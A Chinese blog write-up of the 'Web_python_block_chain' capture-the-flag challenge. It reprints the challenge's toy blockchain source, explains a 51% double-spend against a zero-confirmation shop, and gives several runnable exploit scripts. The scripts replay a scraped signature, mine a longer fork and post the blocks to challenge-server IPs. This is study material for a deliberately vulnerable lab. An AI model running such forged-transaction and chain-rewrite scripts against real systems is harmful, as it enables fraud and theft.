CTF之Web_python_block_chain

最新推荐文章于 2024-07-19 16:36:18 发布
最新推荐文章于 2024-07-19 16:36:18 发布
阅读量958 收藏 23
点赞数 19
分类专栏: ctf 文章标签: python 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/139217437
版权

 这种题对于我来说只能看大佬的wp(但是这一题是wp都看不懂,只能表达一下我的理解了)

(最后有简单方法,前面一种没看懂没关系)

下面这一部分是首页的有用部分

 访问/source_code,得到源码:

# -*- encoding: utf-8 -*-
# written in python 2.7
__author__ = 'garzon'

import hashlib, json, rsa, uuid, os
from flask import Flask, session, redirect, url_for, escape, request
from pycallgraph import PyCallGraph  
from pycallgraph import Config  
from pycallgraph.output import GraphvizOutput 

app = Flask(__name__)
app.secret_key = '*********************'
url_prefix = ''

def FLAG():
    return 'Here is your flag: DDCTF{******************}'

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()
    
def hash_reducer(x, y):
    return hash(hash(x)+hash(y))
    
def has_attrs(d, attrs):
    if type(d) != type({}): raise Exception("Input should be a dict/JSON")
    for attr in attrs:
        if attr not in d:
            raise Exception("{} should be presented in the input".format(attr))

EMPTY_HASH = '0'*64

def addr_to_pubkey(address):
    return rsa.PublicKey(int(address, 16), 65537)
    
def pubkey_to_address(pubkey):
    assert pubkey.e == 65537
    hexed = hex(pubkey.n)
    if hexed.endswith('L'): hexed = hexed[:-1]
    if hexed.startswith('0x'): hexed = hexed[2:]
    return hexed
    
def gen_addr_key_pair():
    pubkey, privkey = rsa.newkeys(384)
    return pubkey_to_address(pubkey), privkey

bank_address, bank_privkey = gen_addr_key_pair()
hacker_address, hacker_privkey = gen_addr_key_pair()
shop_address, shop_privkey = gen_addr_key_pair()
shop_wallet_address, shop_wallet_privkey = gen_addr_key_pair()

def sign_input_utxo(input_utxo_id, privkey):
    return rsa.sign(input_utxo_id, privkey, 'SHA-1').encode('hex')
    
def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])
    
def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo
    
def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)
    ])
    
def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature': [sign_input_utxo(id, privkey_from) for id in input_utxo_ids], 'output': output_utxo}
    tx['hash'] = hash_tx(tx)
    return tx
    
def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])
    
def create_block(prev_block_hash, nonce_str, transactions):
    if type(prev_block_hash) != type(''): raise Exception('prev_block_hash should be hex-encoded hash value')
    nonce = str(nonce_str)
    if len(nonce) > 128: raise Exception('the nonce is too long')
    block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
    block['hash'] = hash_block(block)
    return block
    
def find_blockchain_tail():
    return max(session['blocks'].values(), key=lambda block: block['height'])
    
def calculate_utxo(blockchain_tail):
    curr_block = blockchain_tail
    blockchain = [curr_block]
    while curr_block['hash'] != session['genesis_block_hash']:
        curr_block = session['blocks'][curr_block['prev']]
        blockchain.append(curr_block)
    blockchain = blockchain[::-1]
    utxos = {}
    for block in blockchain:
        for tx in block['transactions']:
            for input_utxo_id in tx['input']:
                del utxos[input_utxo_id]
            for utxo in tx['output']:
                utxos[utxo['id']] = utxo
    return utxos
        
def calculate_balance(utxos):
    balance = {bank_address: 0, hacker_address: 0, shop_address: 0}
    for utxo in utxos.values():
        if utxo['addr'] not in balance:
            balance[utxo['addr']] = 0
        balance[utxo['addr']] += utxo['amount']
    return balance

def verify_utxo_signature(address, utxo_id, signature):
    try:
        return rsa.verify(utxo_id, signature.decode('hex'), addr_to_pubkey(address))
    except:
        return False

def append_block(block, difficulty=int('f'*64, 16)):
    has_attrs(block, ['prev', 'nonce', 'transactions'])
    
    if type(block['prev']) == type(u''): block['prev'] = str(block['prev'])
    if type(block['nonce']) == type(u''): block['nonce'] = str(block['nonce'])
    if block['prev'] not in session['blocks']: raise Exception("unknown parent block")
    tail = session['blocks'][block['prev']]
    utxos = calculate_utxo(tail)
    
    if type(block['transactions']) != type([]): raise Exception('Please put a transaction array in the block')
    new_utxo_ids = set()
    for tx in block['transactions']:
        has_attrs(tx, ['input', 'output', 'signature'])
        
        for utxo in tx['output']:
            has_attrs(utxo, ['amount', 'addr', 'id'])
            if type(utxo['id']) == type(u''): utxo['id'] = str(utxo['id'])
            if type(utxo['addr']) == type(u''): utxo['addr'] = str(utxo['addr'])
            if type(utxo['id']) != type(''): raise Exception("unknown type of id of output utxo")
            if utxo['id'] in new_utxo_ids: raise Exception("output utxo of same id({}) already exists.".format(utxo['id']))
            new_utxo_ids.add(utxo['id'])
            if type(utxo['amount']) != type(1): raise Exception("unknown type of amount of output utxo")
            if utxo['amount'] <= 0: raise Exception("invalid amount of output utxo")
            if type(utxo['addr']) != type(''): raise Exception("unknown type of address of output utxo")
            try:
                addr_to_pubkey(utxo['addr'])
            except:
                raise Exception("invalid type of address({})".format(utxo['addr']))
            utxo['hash'] = hash_utxo(utxo)
        tot_output = sum([utxo['amount'] for utxo in tx['output']])
        
        if type(tx['input']) != type([]): raise Exception("type of input utxo ids in tx should be array")
        if type(tx['signature']) != type([]): raise Exception("type of input utxo signatures in tx should be array")
        if len(tx['input']) != len(tx['signature']): raise Exception("lengths of arrays of ids and signatures of input utxos should be the same")
        tot_input = 0
        tx['input'] = [str(i) if type(i) == type(u'') else i for i in tx['input']]
        tx['signature'] = [str(i) if type(i) == type(u'') else i for i in tx['signature']]
        for utxo_id, signature in zip(tx['input'], tx['signature']):
            if type(utxo_id) != type(''): raise Exception("unknown type of id of input utxo")
            if utxo_id not in utxos: raise Exception("invalid id of input utxo. Input utxo({}) does not exist or it has been consumed.".format(utxo_id))
            utxo = utxos[utxo_id]
            if type(signature) != type(''): raise Exception("unknown type of signature of input utxo")
            if not verify_utxo_signature(utxo['addr'], utxo_id, signature):
                raise Exception("Signature of input utxo is not valid. You are not the owner of this input utxo({})!".format(utxo_id))
            tot_input += utxo['amount']
            del utxos[utxo_id]
        if tot_output > tot_input:
            raise Exception("You don't have enough amount of DDCoins in the input utxo! {}/{}".format(tot_input, tot_output))
        tx['hash'] = hash_tx(tx)
    
    block = create_block(block['prev'], block['nonce'], block['transactions'])
    block_hash = int(block['hash'], 16)
    if block_hash > difficulty: raise Exception('Please provide a valid Proof-of-Work')
    block['height'] = tail['height']+1
    if len(session['blocks']) > 50: raise Exception('The blockchain is too long. Use ./reset to reset the blockchain')
    if block['hash'] in session['blocks']: raise Exception('A same block is already in the blockchain')
    session['blocks'][block['hash']] = block
    session.modified = True
    
def init():
    if 'blocks' not in session:
        session['blocks'] = {}
        session['your_diamonds'] = 0
        # First, the bank issued some DDCoins ...
        total_currency_issued = create_output_utxo(bank_address, 1000000)
        genesis_transaction = create_tx([], [total_currency_issued]) # create DDCoins from nothing
        genesis_block = create_block(EMPTY_HASH, 'The Times 03/Jan/2009 Chancellor on brink of second bailout for bank', [genesis_transaction])
        session['genesis_block_hash'] = genesis_block['hash']
        genesis_block['height'] = 0
        session['blocks'][genesis_block['hash']] = genesis_block
    
        # Then, the bank was hacked by the hacker ...
        handout = create_output_utxo(hacker_address, 999999)
        reserved = create_output_utxo(bank_address, 1)
        transferred = create_tx([total_currency_issued['id']], [handout, reserved], bank_privkey)
        second_block = create_block(genesis_block['hash'], 'HAHA, I AM THE BANK NOW!', [transferred])
        append_block(second_block)
    
        # Can you buy 2 diamonds using all DDCoins?
        third_block = create_block(second_block['hash'], 'a empty block', [])
        append_block(third_block)
        
def get_balance_of_all():
    init()
    tail = find_blockchain_tail()
    utxos = calculate_utxo(tail)
    return calculate_balance(utxos), utxos, tail
    
@app.route(url_prefix+'/')
def homepage():
    announcement = 'Announcement: The server has been restarted at 21:45 04/17. All blockchain have been reset. '
    balance, utxos, _ = get_balance_of_all()
    genesis_block_info = 'hash of genesis block: ' + session['genesis_block_hash']
    addr_info = 'the bank\'s addr: ' + bank_address + ', the hacker\'s addr: ' + hacker_address + ', the shop\'s addr: ' + shop_address
    balance_info = 'Balance of all addresses: ' + json.dumps(balance)
    utxo_info = 'All utxos: ' + json.dumps(utxos)
    blockchain_info = 'Blockchain Explorer: ' + json.dumps(session['blocks'])
    view_source_code_link = "<a href='source_code'>View source code</a>"
    return announcement+('<br /><br />\r\n\r\n'.join([view_source_code_link, genesis_block_info, addr_info, balance_info, utxo_info, blockchain_info]))
    
    
@app.route(url_prefix+'/flag')
def getFlag():
    init()
    if session['your_diamonds'] >= 2: return FLAG()
    return 'To get the flag, you should buy 2 diamonds from the shop. You have {} diamonds now. To buy a diamond, transfer 1000000 DDCoins to '.format(session['your_diamonds']) + shop_address
    
def find_enough_utxos(utxos, addr_from, amount):
    collected = []
    for utxo in utxos.values():
        if utxo['addr'] == addr_from:
            amount -= utxo['amount']
            collected.append(utxo['id'])
        if amount <= 0: return collected, -amount
    raise Exception('no enough DDCoins in ' + addr_from)
    
def transfer(utxos, addr_from, addr_to, amount, privkey):
    input_utxo_ids, the_change = find_enough_utxos(utxos, addr_from, amount)
    outputs = [create_output_utxo(addr_to, amount)]
    if the_change != 0:
        outputs.append(create_output_utxo(addr_from, the_change))
    return create_tx(input_utxo_ids, outputs, privkey)
    
@app.route(url_prefix+'/5ecr3t_free_D1diCoin_b@ckD00r/<string:address>')
def free_ddcoin(address):
    balance, utxos, tail = get_balance_of_all()
    if balance[bank_address] == 0: return 'The bank has no money now.'
    try:
        address = str(address)
        addr_to_pubkey(address) # to check if it is a valid address
        transferred = transfer(utxos, bank_address, address, balance[bank_address], bank_privkey)
        new_block = create_block(tail['hash'], 'b@cKd00R tr1993ReD', [transferred])
        append_block(new_block)
        return str(balance[bank_address]) + ' DDCoins are successfully sent to ' + address
    except Exception, e:
        return 'ERROR: ' + str(e)

DIFFICULTY = int('00000' + 'f' * 59, 16)
@app.route(url_prefix+'/create_transaction', methods=['POST'])
def create_tx_and_check_shop_balance():
    init()
    try:
        block = json.loads(request.data)
        append_block(block, DIFFICULTY)
        msg = 'transaction finished.'
    except Exception, e:
        return str(e)
        
    balance, utxos, tail = get_balance_of_all()
    if balance[shop_address] == 1000000:
        # when 1000000 DDCoins are received, the shop will give you a diamond
        session['your_diamonds'] += 1
        # and immediately the shop will store the money somewhere safe.
        transferred = transfer(utxos, shop_address, shop_wallet_address, balance[shop_address], shop_privkey)
        new_block = create_block(tail['hash'], 'save the DDCoins in a cold wallet', [transferred])
        append_block(new_block)
        msg += ' You receive a diamond.'
    return msg
    
        
# if you mess up the blockchain, use this to reset the blockchain.
@app.route(url_prefix+'/reset')
def reset_blockchain():
    if 'blocks' in session: del session['blocks']
    if 'genesis_block_hash' in session: del session['genesis_block_hash']
    return 'reset.'
    
@app.route(url_prefix+'/source_code')
def show_source_code():
    source = open('serve.py', 'r')
    html = ''
    for line in source:
        html += line.replace('&','&amp;').replace('\t', '&nbsp;'*4).replace(' ','&nbsp;').replace('<', '&lt;').replace('>','&gt;').replace('\n', '<br />')
    source.close()
    return html
    
if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0')

 下面是大佬对题的解释(看不懂)

51% 双花攻击

    这道题整的解法是 51% (双花)攻击。
    请于正常的区块链区分开来,题目环境中只有你一个玩家,并没有人与你竞争(挖矿)。
    商店交易采用0确认,而不是现实中的6确认。
    当出现分叉时,区块链的规则认最长的分链为主链,并舍去原有的链。
    区块链允许添加空块
    51%(双花)攻击可以达到的目的就是使攻击前的交易作废,这里的前不一定是前一个,而是很大程度上取决于你的算力的。让之前的交易作废有什么好处呢?这里我们就要考虑0确认和6确认的区别了。

先看看6确认:

当产生一笔交易时,区块链的P2P网络会广播这笔交易,这笔交易会被一个挖矿节点收到,并验证,如果这个挖矿节点挖到区块(生成的hash满足条件)后,并且这笔交易的手续费足够吸引这个节点去打包进区块,那这笔交易就会被打包进区块。因此就得到了一个确认,这个矿工也拿走了相应的手续费。 这个挖矿节点打包后,会把区块广播给其他节点。其他节点验证并广播这个区块。 如果这个区块得到更多的挖矿节点的验证确认,那就得到了更多的确认。这样这笔交易就被记录到了比特币区块链,并成为了比特币账本的一部分。如果得到6个确认后,我们就认为它永远不可变了。

0确认就同样的道理了,那就是不需要别人确认,就如我们生活中的一手交钱一手交货,不同的是生活中我们处于中心化社会,银行会帮我们确认。而6确认就是需要经过6个人(区块被挖出)交易才确定。

可以看到对0确认和6确认进行51%(双花)攻击的难度是不一样的,6确认需要的算力明显要大,因为他要多比其他人生成6个区块。(应该可以这样理解吧,可能我还需要继续学习,如上,如有不对可以联系我(jay80#protonmail.com)改正,在这也谢谢各位大佬了。)好在,题目并不是采用6确认。

然后再看看这里的51% 攻击,其实这里说的51%是指算力,也就是这种攻击需要攻击者具备全网51%的算力,因为这样才有机会使自己生成(挖出)区块的速度超过其他人,然后按区块链的规则:当出现分叉时,区块链的规则认最长的分链为主链,并舍去原有的链,就达到了撤销原来链上已经存在的交易,拿回该交易使用了的钱的目的,这里我的另一个理解就是可以使交易回滚,从而追回被盗的钱。

 

 原理上明白了以后,我们就开始从代码上进行实际攻击。首先我们先看一下一个标准的区块是咋样的,下面其实就是黑客盗取银行的区块:

就是第一张图里的东西,自己整理一下方便看就行了

{
    "nonce": "HAHA, I AM THE BANK NOW!",
    "prev": "13bfff8cdedf1d81f4103ca8349fc26eff17b446bcb3cdbee845d101f20f11b9",
    "hash": "fe69dbe81d51b49101ea8b6be4a4ef118992d2a94dd7b16016e27e40b0da17f0", 
    "transactions": 
    [
        {"input": ["ad8b4d4a-138b-4eb0-8fb3-f963646370e3"],
        "signature":                        ["809bc81884ea06f16cbccc1f0ce39f0dbbdcd0912541d50ba394b5496888a1c437d59f31b7014b2aace6a5188025bc3f"], 
           "hash": "c1d88d88f49d69fddb81397b5f99652508c87647e7ee843a287f3e9184e78c6a", 
        "output": [{"amount": 999999,
         "hash": "dbb6c731b3d5d92432683cb2913a5bee17846b5d512534f105429ebf0ecb94e7", 
        "addr": "8ab9eb40808cbff9e8b0144319032f2ed052b13053f7c43d258f107aaaf3e5b75aedbad2ad5e4154d581ebb2e426e0d5",
         "id": "d41f5c34-ab18-4c7e-b416-c6460483d816"}, 
        {"amount": 1,
         "hash": "529dc4771c28f768ae873a384ce7824aed48e02344cec0da67a56d78cf9b014f",  
                "addr":"d1936e6b7dbc07f838cf255022ad83b877c1a91a3d87e6df479295ae5a0cb2e80106a2ad15b93da51a73d34a6ff0806b", 
"id": "a737ab47-fde4-47f3-a058-5b6acbfc3c7c"}
        ]
            ],
 "height": 1}
}

按照流程,我们应该构造一个转钱给商店的区块。但通过代码,我们可以发现转账的时候是需要私钥签名的,也就是这个signature段。 

 

 这些信息我们可以通过黑客留下的signature直接绕过,并且上一步的input也可以从黑客的区块中得到。所以我们就可以直接构造转账给商店的区块了,并且通过51%攻击使黑客转走的钱追回。

后续访问 传参需要访问 "http://61.147.171.105:63520/signature/create_transaction"需要用到signature(需要解码后使用,但是太麻烦了所以我没用这个)

 

下面直接放出大佬完整的payload脚本,需要特别提醒的是要注意每个区块的prev。

# -*- coding: utf-8 -*-
import json, uuid, hashlib
import random,string

EMPTY_HASH = '0' * 64
DIFFICULTY = int('00000' + 'f' * 59, 16)

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x) + hash(y))

# 对 output 进行hash
def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = str(hash_utxo(utxo))
    return utxo

# 对 transactions 进行hash
def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)
    ])

#对整个块 hash
def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'],
                                 reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

prev = "5bc355ab21fd7e07040e2882f36ff8fba90809cbaa27b80bc1439a6e85beec25"
input = ["e95c5a89-3f0e-4bd6-a4bc-8ff006fa2a42"]
signature = ['8cf74260504449ce72c537b587b534c7f93e459d97898faea8a3a68622bbe01f2117fba4cfd3cff69f12e209d74cf87c']


address = 'b81ff6d961082076f3801190a731958aec88053e8191258b0ad9399eeecd8306924d2d2a047b5ec1ed8332bf7a53e735'
output = [create_output_utxo(address,1000000)]

transactions = {
        "input":input,
        "signature":signature,
        "output":output
    }

# 对 transactions 进行签名
hash_transactions = hash_tx(transactions)
transactions['hash'] = str(hash_transactions)
# 爆破(挖矿,找到满足条件的hash)
def fuzz(block, size=20):
    CHARS = string.letters + string.digits
    while True:
        rnds = ''.join(random.choice(CHARS) for _ in range(size))
        block['nonce'] = rnds
        block_hash = str(hash_block(block))
        # 转换成 16 进制
        tmp_hash = int(block_hash, 16)
        # POW 验证工作
        if tmp_hash < DIFFICULTY:
            block['hash'] = block_hash
            return block

# 创建符合条件的块
block = {
    "prev":prev,
    "transactions":[transactions]
}
ok_block = fuzz(block)
print(json.dumps(ok_block))
# 创建一个空块
empty_tmp = {
    "prev" : ok_block['hash'],
    "transactions" : []
}
empty_block1 = fuzz(empty_tmp)
print(json.dumps(empty_block1))

empty_tmp = {
    "prev" : empty_block1['hash'],
    "transactions" : []
}
empty_block2 = fuzz(empty_tmp)
print(json.dumps(empty_block2))

empty_tmp = {
    "prev" : empty_block2['hash'],
    "transactions" : []
}
empty_block3 = fuzz(empty_tmp)
print(json.dumps(empty_block3))

empty_tmp = {
    "prev" : empty_block3['hash'],
    "transactions" : []
}
empty_block4 = fuzz(empty_tmp)
print(json.dumps(empty_block4))

运行后会得到5个区块,然后依次post就可以了

(搞不懂为什么大佬都喜欢用python2,害得我安装了一天的python2,最后却因为python2的很多模块已经停止维护了,需要自己修改调试,所以就失败了。然后我就将源码修改成了python3)

注(这个代码的adderss:是http://url/flag下的账号)

下面是我的py3代码

import json
import uuid
import hashlib
import random
import string
import functools

EMPTY_HASH = '0' * 64
DIFFICULTY = int('00000' + 'f' * 59, 16)

def hash(x):
    return hashlib.sha256(x).hexdigest()

def hash_reducer(x, y):
    return hash(x.encode() + y.encode())

def hash_utxo(utxo):
    return functools.reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = str(hash_utxo(utxo))
    return utxo

def hash_tx(tx):
    return functools.reduce(hash_reducer, [
        functools.reduce(hash_reducer, tx['input'], EMPTY_HASH),
        functools.reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)
    ])

def hash_block(block):
    return functools.reduce(hash_reducer, [block['prev'], block['nonce'],
                                           functools.reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

prev = "13bfff8cdedf1d81f4103ca8349fc26eff17b446bcb3cdbee845d101f20f11b9"
input_id = ["ad8b4d4a-138b-4eb0-8fb3-f963646370e3"]
signature = ["809bc81884ea06f16cbccc1f0ce39f0dbbdcd0912541d50ba394b5496888a1c437d59f31b7014b2aace6a5188025bc3f"]

address = '8dde0388d3ec4b146adc3e9eebcfa2f87d1b22207bdac08f9386cb6f962361704d446e622d9f56070340facb04fc8b15'
output = [create_output_utxo(address, 1000000)]

transactions = {
    "input": input_id,
    "signature": signature,
    "output": output
}

hash_transactions = hash_tx(transactions)
transactions['hash'] = str(hash_transactions)

def fuzz(block, size=20):
    CHARS = string.ascii_letters + string.digits
    while True:
        rnds = ''.join(random.choice(CHARS) for _ in range(size))
        block['nonce'] = rnds
        block_hash = str(hash_block(block))
        tmp_hash = int(block_hash, 16)
        if tmp_hash < DIFFICULTY:
            block['hash'] = block_hash
            return block

block = {
    "prev": prev,
    "transactions": [transactions]
}
ok_block = fuzz(block)
print(json.dumps(ok_block))

empty_tmp = {
    "prev": ok_block['hash'],
    "transactions": []
}
empty_block1 = fuzz(empty_tmp)
print(json.dumps(empty_block1))

empty_tmp = {
    "prev": empty_block1['hash'],
    "transactions": []
}
empty_block2 = fuzz(empty_tmp)
print(json.dumps(empty_block2))

empty_tmp = {
    "prev": empty_block2['hash'],
    "transactions": []
}
empty_block3 = fuzz(empty_tmp)
print(json.dumps(empty_block3))

empty_tmp = {
    "prev": empty_block3['hash'],
    "transactions": []
}
empty_block4 = fuzz(empty_tmp)
print(json.dumps(empty_block4))

 运行后如下

 

 会生成五个区块,分别以post方式传入,再访问url/flag可以得到flag

 我们还可以使用大佬py2脚本,直接获得flag(后面有我的python3代码)

# -*- encoding: utf-8 -*-
# written in python 2.7
import hashlib, json, rsa, uuid, os,requests,re

# 一堆变量常量

url_root="http://220.249.52.133:58044"
url_create="http://220.249.52.133:58044/create_transaction"
url_flag="http://220.249.52.133:58044/flag"

s=requests.Session()
ddcoin = s.get(url=url_root)

prev_one=re.search(r"hash of genesis block: ([0-9a-f]{64})",ddcoin.content, flags=0).group(1)
bank_utox_id=re.search(r"\"input\": \[\"([0-9a-f\-]{36})",ddcoin.content, flags=0).group(1)
bank_signature=re.search(r"\"signature\": \[\"([0-9a-f]{96})",ddcoin.content, flags=0).group(1)

DIFFICULTY = int('00000' + 'f' * 59, 16)
EMPTY_HASH = '0'*64

bank_addr="8aaa41fad552f9a2231bba5242c58df16da1840979e37f0a20d5912ca829d240df4a992bd6518123a1c7034844448465"
hacke_addr="a4e4ec9827a53e8cf88d5eda99a3b965c8ae8eb334c5863fb874f554ce80ebf814f510fe3aef1c5a6dfb64c3bd7de1ab"
shop_addr="9095cbe784e2c97c5076a9806171056356b8ee5d26ca9343af25e2a036a2301a82581c0044eee5c15cf3de9a2655e85b"

# 源码中的API

def hash(x):
    return hashlib.sha256(hashlib.md5(x).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x)+hash(y))

def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)
    ])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature':[bank_signature], 'output': output_utxo}  # 修改了签名
    tx['hash'] = hash_tx(tx)
    return tx

def create_block(prev_block_hash, nonce_str, transactions):
    if type(prev_block_hash) != type(''): raise Exception('prev_block_hash should be hex-encoded hash value')
    nonce = str(nonce_str)
    if len(nonce) > 128: raise Exception('the nonce is too long')
    block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
    block['hash'] = hash_block(block)
    return block


# 构造的方法

def check_hash(prev,tx):
    for i in range(10000000):
        current_block=create_block(prev,str(i),tx)
        block_hash = int(current_block['hash'], 16)
        if block_hash<DIFFICULTY:
            print json.dumps(current_block)
            return current_block

def create_feak_one():
    utxo_first=create_output_utxo(shop_addr,1000000)
    tx_first=create_tx([bank_utox_id],[utxo_first])
    return check_hash(prev_one,[tx_first])

def create_empty_block(prev):
    return check_hash(prev,[])


# 攻击过程

a=create_feak_one()
print s.post(url=url_create,data=str(json.dumps(a))).content
b=create_empty_block(a['hash'])
print s.post(url=url_create,data=str(json.dumps(b))).content
c=create_empty_block(b['hash'])
print s.post(url=url_create,data=str(json.dumps(c))).content
d=create_empty_block(c['hash'])
print s.post(url=url_create,data=str(json.dumps(d))).content
e=create_empty_block(d['hash'])
print s.post(url=url_create,data=str(json.dumps(e))).content
print s.get(url=url_flag).content

标注的地方记得替换直接的url和addr

import hashlib
import json
import rsa
import uuid
import os
import requests
import re
from functools import reduce
#记得修改
url_root = "http://61.147.171.105:63520/"
url_create = "http://61.147.171.105:63520/create_transaction"
url_flag = "http://61.147.171.105:63520/flag"

s = requests.Session()
ddcoin = s.get(url=url_root)

prev_one = re.search(r"hash of genesis block: ([0-9a-f]{64})", ddcoin.content.decode(), flags=0).group(1)
bank_utox_id = re.search(r"\"input\": \[\"([0-9a-f\-]{36})", ddcoin.content.decode(), flags=0).group(1)
bank_signature = re.search(r"\"signature\": \[\"([0-9a-f]{96})", ddcoin.content.decode(), flags=0).group(1)

DIFFICULTY = int('00000' + 'f' * 59, 16)
EMPTY_HASH = '0'*64
#这里也要
bank_addr = "b244757baa7cd4071deba24da53ddfb2e5d763563fa57c5653ccfa6e7545e3369cbaf9a1c41d9951b1f1a39b78e0528d"
hacke_addr = "8a537f7f1a39857e567640f6cc530dc64732062dec8fa5d93643be53496ae08d9738afed66925018bcd4f8980841f61d"
shop_addr = "8dde0388d3ec4b146adc3e9eebcfa2f87d1b22207bdac08f9386cb6f962361704d446e622d9f56070340facb04fc8b15"

# 源码中的API

def hash(x):
    return hashlib.sha256(hashlib.md5(x.encode()).digest()).hexdigest()

def hash_reducer(x, y):
    return hash(hash(x)+hash(y))

def hash_block(block):
    return reduce(hash_reducer, [block['prev'], block['nonce'], reduce(hash_reducer, [tx['hash'] for tx in block['transactions']], EMPTY_HASH)])

def hash_utxo(utxo):
    return reduce(hash_reducer, [utxo['id'], utxo['addr'], str(utxo['amount'])])

def hash_tx(tx):
    return reduce(hash_reducer, [
        reduce(hash_reducer, tx['input'], EMPTY_HASH),
        reduce(hash_reducer, [utxo['hash'] for utxo in tx['output']], EMPTY_HASH)
    ])

def create_output_utxo(addr_to, amount):
    utxo = {'id': str(uuid.uuid4()), 'addr': addr_to, 'amount': amount}
    utxo['hash'] = hash_utxo(utxo)
    return utxo

def create_tx(input_utxo_ids, output_utxo, privkey_from=None):
    tx = {'input': input_utxo_ids, 'signature':[bank_signature], 'output': output_utxo}  # 修改了签名
    tx['hash'] = hash_tx(tx)
    return tx

def create_block(prev_block_hash, nonce_str, transactions):
    if type(prev_block_hash) != type(''): raise Exception('prev_block_hash should be hex-encoded hash value')
    nonce = str(nonce_str)
    if len(nonce) > 128: raise Exception('the nonce is too long')
    block = {'prev': prev_block_hash, 'nonce': nonce, 'transactions': transactions}
    block['hash'] = hash_block(block)
    return block


# 构造的方法

def check_hash(prev, tx):
    for i in range(10000000):
        current_block = create_block(prev, str(i), tx)
        block_hash = int(current_block['hash'], 16)
        if block_hash < DIFFICULTY:
            print(json.dumps(current_block))
            return current_block

def create_feak_one():
    utxo_first = create_output_utxo(shop_addr, 1000000)
    tx_first = create_tx([bank_utox_id], [utxo_first])
    return check_hash(prev_one, [tx_first])

def create_empty_block(prev):
    return check_hash(prev, [])


# 攻击过程

a = create_feak_one()
print(s.post(url=url_create, data=str(json.dumps(a))).content.decode())
b = create_empty_block(a['hash'])
print(s.post(url=url_create, data=str(json.dumps(b))).content.decode())
c = create_empty_block(b['hash'])
print(s.post(url=url_create, data=str(json.dumps(c))).content.decode())
d = create_empty_block(c['hash'])
print(s.post(url=url_create, data=str(json.dumps(d))).content.decode())
e = create_empty_block(d['hash'])
print(s.post(url=url_create, data=str(json.dumps(e))).content.decode())
print(s.get(url=url_flag).content.decode())

 运行结果如下

 

 ctf{922a488e-f243-4b09-ae2d-fa2725da79ea}

小黑子不会打篮球
关注
  • 19
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--Web_python_block_chain
qq_46263951的博客
01-21 1万+
通过这道题对区块链有了一个简单的了解,这道题主要是参考师傅们的wp,所以这里就不再赘述,主要讲一下自己的收获。 这道题利用的是双花攻击中的51% attack。51% attack指的是攻击者如果可以拥有超过全网50%的算力,就可以创造一条高度大于原始链的链,攻击者可以发送一个新的块到这条链上。 这里使用的为0确认,就是不需要别人确认,就如我们生活中的一手交钱一手交货,不同的是生活中我们处于中心化社会,银行会帮我们确认。而6确认就是需要经过6个人(区块被挖出)交易才确定。 区块链的规则:当出现分叉时,
攻防世界 web高手进阶区 8分题 Web_python_block_chain
闵行小鱼塘
10-03 1540
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是Web_python_block_chain的writeup
攻防世界web进阶区Web_python_block_chain详解
hxhxhxhxx的博客
08-19 2566
攻防世界web进阶区Web_python_block_chain详解题目详解51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been restarted at 21: 45 04 / 17.All blockchain have been reset.View source code hash of genesis block: 1787809bc3d510a8137f05be51aca5b4597112339cd51f819ccd979372ef3
[攻防世界]-WEB高手进阶区-Web_python_block_chain
爱国小白帽
10-02 785
Poc 已给出,只需更改 ip 和三个 addr # -*- encoding: utf-8 -*- # written in python 2.7 import hashlib, json, rsa, uuid, os,requests,re # 一堆变量常量 url_root="http://220.249.52.133:39176/" url_create="http://220.249.52.133:39176/create_transaction" url_flag="http://220.
攻防世界(web高手进阶区)——32~44题
weixin_43610673的博客
08-04 2388
